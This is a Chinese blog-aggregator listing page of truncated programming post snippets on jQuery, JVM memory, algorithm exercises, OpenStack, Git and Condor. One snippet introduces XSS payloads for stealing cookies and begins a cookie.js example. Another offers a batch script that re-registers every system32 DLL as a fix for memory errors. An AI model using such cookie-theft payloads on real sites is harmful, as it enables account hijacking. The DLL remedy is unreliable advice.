jQuery 动态创建对象 异步事件
分类:
其他 时间:
2015-01-22 14:41:22
收藏:
0 评论:
0 赞:
0 阅读:
274
页面代码:js代码:
分类:
其他 时间:
2015-01-22 14:40:52
收藏:
0 评论:
0 赞:
0 阅读:
283
字符串模拟水题。 1 /* 3587 */ 2 #include 3 #include 4 #include 5 #include 6 #include 7 #include 8 using namespace std; 9 10 #define MAXN 1005 ...
分类:
其他 时间:
2015-01-22 14:38:59
收藏:
0 评论:
0 赞:
0 阅读:
235
连接:http://my.oschina.net/sunchp/blog/3697071.JVM内存模型JVM运行时内存=共享内存区+线程内存区1).共享内存区共享内存区=持久带+堆持久带=方法区+其他堆=Old Space+Young SpaceYoung Space=Eden+S0+S1(1)持...
分类:
其他 时间:
2015-01-22 14:38:58
收藏:
0 评论:
0 赞:
0 阅读:
251
字符串-05. 字符串循环左移(20)时间限制400 ms内存限制65536 kB代码长度限制8000 B判题程序Standard作者白洪欢(浙江大学)输入一个字符串和一个非负整数N,要求将字符串循环左移N次。输入格式:输入在第1行中给出一个不超过100个字符长度的、以回车结束的非空字符串;第2行给...
分类:
其他 时间:
2015-01-22 14:38:15
收藏:
0 评论:
0 赞:
0 阅读:
308
引言本文来自于Google的一道题目:how to merge two binary search tree into balanced binary search tree.how to merge two binary search tree into balanced binary searc...
分类:
其他 时间:
2015-01-22 14:37:45
收藏:
0 评论:
0 赞:
0 阅读:
252
1. N的因子个数条件:给定任意一个一个正整数N要求:求其因子的个数首先给出结论:对于任意的整型N,分解质因数得到N= P1^x1 * P2^x2* …… * Pn^xn;则N的因子个数M为 M=(x1+1) * (x2+1) * …… *(xn+1);证明过程:首先 举个例子吧24 = 2^3 *...
分类:
其他 时间:
2015-01-22 14:37:35
收藏:
0 评论:
0 赞:
0 阅读:
245
Description“Point, point, life of student!”This is a ballad(歌谣)well known in colleges, and you must care about your score in this exam too. How many p...
分类:
其他 时间:
2015-01-22 14:37:05
收藏:
0 评论:
0 赞:
0 阅读:
294
微软近期Open的职位:We are the Skype Beijing team. Skype division drives the communications strategy for Microsoft and has a vision is to “be the global commu...
分类:
其他 时间:
2015-01-22 14:36:55
收藏:
0 评论:
0 赞:
0 阅读:
257
近期在部署OpenStack时涉及到各个服务之间的诸多概念,这里简要记录其中的一些作为备忘。服务(service)在OpenStack中,一个服务有若干端点,用户通过端点访问服务并使用服务提供的功能;计算服务(Compute Service)——Nova网络服务(Networking Servi.....
分类:
其他 时间:
2015-01-22 14:36:45
收藏:
0 评论:
0 赞:
0 阅读:
318
using AnfleCrawler.Common;using System;using System.Collections.Generic;using System.Linq;using System.Net;using System.Text;using System.Threading.Ta...
分类:
其他 时间:
2015-01-22 14:36:11
收藏:
0 评论:
0 赞:
0 阅读:
333
#include #include #include #include char ** split(char *mother, char split_char){ char *arry[1024]; //the MAX sub string is 1024 and you can modif...
分类:
其他 时间:
2015-01-22 14:34:25
收藏:
0 评论:
0 赞:
0 阅读:
160
由于我新建了一个团队,团队里的人对于GIT都不太熟悉,所以才有了这篇文章。我用的是git-1.9.4的版本,所以我建议团队里面的成员也使用这个版本。首先是下载git,这个自己去网上找吧,一大堆,记得是1.9.4版本。安装的话需要注意一下这个地方。记得把框框里面的都勾上,这个是右键菜单里的东西,很.....
分类:
其他 时间:
2015-01-22 14:34:15
收藏:
0 评论:
0 赞:
0 阅读:
486
xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。1.盗取cookie,发起cookie劫持使用xss漏洞插入cookie.jscookie.js代码:1var img = document.createElement("img");...
分类:
其他 时间:
2015-01-22 14:33:55
收藏:
0 评论:
0 赞:
0 阅读:
317
@echo offecho 运行后,能重新注册系统所有的dll文件,echo 能解决内存读写错误的问题pauseecho onfor %%1 in (%windir%/system32/*.dll) do regsvr32.exe /s %%1echo 注册dll完成pause
分类:
其他 时间:
2015-01-22 14:33:45
收藏:
0 评论:
0 赞:
0 阅读:
270
jQuery.mobile.changePage( to [, options ] )从一个页面跳转到另一个页面,使用$.mobile对象的changePage方法来实现。但要使用此方式的时候,要以点击一个链接或者提交表单来实现。此方法有两个参数。to:是第一个参数,是必须的,不可缺少。类型:字符串...
分类:
其他 时间:
2015-01-22 14:33:25
收藏:
0 评论:
0 赞:
0 阅读:
234
因为工作原因,前段时间遇到这样的问题游戏角色合服,但是每个区服下同一个账号只能保留3个角色,那么问题来了,挖掘机技术那家强?...
分类:
其他 时间:
2015-01-22 13:26:46
收藏:
0 评论:
0 赞:
0 阅读:
315
Is a loop ? Question descrip as follows :
Assume that wehave a head pointer to a link-list. Also assumethat we know the list is single-linked. Can you come up an algorithm to checkwhether this link list includes a loop by using O(n) time and O(1) ...
分类:
其他 时间:
2015-01-22 13:26:36
收藏:
0 评论:
0 赞:
0 阅读:
345
root@ArmCat:~# hciconfig -a
hci0: Type: BR/EDR Bus: SDIO
BD Address: CC:52:AF:D6:1C:3...
分类:
其他 时间:
2015-01-22 13:25:25
收藏:
0 评论:
0 赞:
0 阅读:
309
一、deb包安装condor方法
自己去下载condor-8.2.6-287355-ubuntu_14.04_amd64.deb。我还下载了一个libmpich2-3_1.4.1-4.2_amd64.deb包,这是condor需要的一个依赖包,apt-get解决不了,就自己安装一下。我新建了一个condor用户,并将其加入sudoers,以下的操作都是在condor下进行的
安装deb包
$...
分类:
其他 时间:
2015-01-22 13:25:15
收藏:
0 评论:
0 赞:
0 阅读:
416